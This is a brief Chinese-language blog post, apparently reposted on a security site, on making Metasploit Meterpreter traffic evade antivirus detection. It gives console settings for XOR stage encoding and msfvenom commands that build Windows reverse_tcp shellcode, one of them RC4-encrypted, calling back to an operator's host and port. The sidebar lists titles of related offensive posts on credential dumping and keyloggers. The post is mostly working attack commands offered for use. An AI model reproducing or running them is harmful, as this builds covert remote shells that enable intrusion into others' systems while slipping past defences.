Meterpreter 流量免杀

2023年12月15日23:51:44评论23 views字数 469阅读1分33秒阅读模式

对 meterpreter 流量进行编码或加密, 有两种方式.

指定编码方式, 名称与对 shellcode 的编码器相同.

set EnableStageEncoding true
set StageEncoder x86/xor_dynamic
set StageEncodingFallback false

生成 shellcode.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 EnableStageEncoding=true StageEncoder=x86/xor_dynamic StageEncodingFallback=false -f c -o shellcode.c

或是直接生成通过 rc4 加密流量的 shellcode.

msfvenom -p windows/meterpreter/reverse_tcp_rc4 LHOST=192.168.1.1 LPORT=4444 RC4PASSWORD=exp10it -f c -o shellcode.c

- By:X1r0z[exp10it.cn]

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2023年12月15日23:51:44
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
Meterpreter 流量免杀https://cn-sec.com/archives/2306601.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

Meterpreter 流量免杀

php Thread实例

获取wdigest明文密码加密传输至远程服务器

dump lsass进程

CVE-2020-0688 powershell版

CVE-2020-0601 伪造签名笔记

从零开始学windows API

查看注册表键值修改时间

c++ 修改注册表键值

keylogger

使用 R820T2 电视棒收听 FM 广播

发表评论

在线咨询

微信